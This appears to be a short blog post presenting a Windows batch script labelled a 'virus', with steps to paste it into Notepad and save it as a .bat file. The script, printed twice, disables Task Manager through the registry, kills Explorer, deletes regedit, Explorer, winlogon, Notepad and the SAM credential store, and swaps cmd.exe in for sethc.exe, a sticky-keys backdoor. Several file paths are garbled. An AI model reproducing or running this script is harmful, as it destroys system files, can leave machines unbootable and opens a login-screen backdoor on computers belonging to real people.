A SIMPLE VIRUS CODING IN BATCH
which will help you to kill / delete any system file or task.
Note: This can harm your computer so, Dont try it on main Machine rather try it on Virtual Machine
Run it on your own risk
Paste the below code in any text - editor like Notepad and save it as "GJsVirus.bat".
Note: use the extension " .bat ".
Code for
Batch file - Virus :
@echo off
REG add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
del %systemdrive%\windowsregedit.exe
taskkill explorer.exe
del %systemdrive%\windowsexplorer.exe
copy %systemdrive%\windowssystem32sethc.exe d:cmd.exe
copy d:cmd.exe %systemdrive%\windowssystem32
del %systemdrive%\WINDOWS\system32\config\SAM
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\NOTEPAD.exe
REG add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
del %systemdrive%\windowsregedit.exe
taskkill explorer.exe
del %systemdrive%\windowsexplorer.exe
copy %systemdrive%\windowssystem32sethc.exe d:cmd.exe
copy d:cmd.exe %systemdrive%\windowssystem32
del %systemdrive%\WINDOWS\system32\config\SAM
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\NOTEPAD.exe
No comments:
Post a Comment